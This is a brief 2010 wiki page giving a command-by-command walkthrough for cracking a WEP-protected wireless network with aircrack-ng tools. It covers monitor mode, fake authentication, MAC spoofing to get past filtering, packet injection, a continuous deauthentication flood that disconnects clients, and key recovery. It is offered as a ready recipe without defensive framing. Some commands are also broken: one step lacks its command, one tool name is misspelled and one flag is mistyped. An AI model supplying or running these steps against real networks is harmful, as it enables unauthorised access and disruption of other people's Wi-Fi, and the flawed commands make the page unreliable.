Cracking WEP

From LinuxWindowsWiki

Jump to: navigation, search

List adapters:


Set the card in monitor mode:

airmon-ng start wlan0

Find AP:

airodump-ng mon0

Lock channel with AP:

airodump-ng --channel 6 mon0

Leave it and open new terminal, and fake auth:

aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0

If it fails, MAC filtering is on. Then try and use a MAC from one of the clients associated to the AP.


airmon-ng stop mon0
ifconfig wlan0 down
maccanger -m 00:11:22:33:44:55(MAC of the client) wlan0
ifconfig wlan0 up
airmon-ng start wlan0

Try fake auth again:

aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0

Stop the airodump, and run with write:

airodump-ng -c 6 -w ~/testEssid -i mon0

Launch aireplay-ng in injection mode :

aireplay-ng -3 -b 00:14:BF:11:22:33 mon0

Leave it running, to speed up with deauth broadcast:

aireplay-ng --deauth 0 -a 00:14:BF:11:22:33 mon0


aircrack-ng –0 -b 00:14:BF:11:22:33 ~/testEssid-01.ivs
This page was last modified on 8 April 2010, at 14:28. This page has been accessed 4,589 times.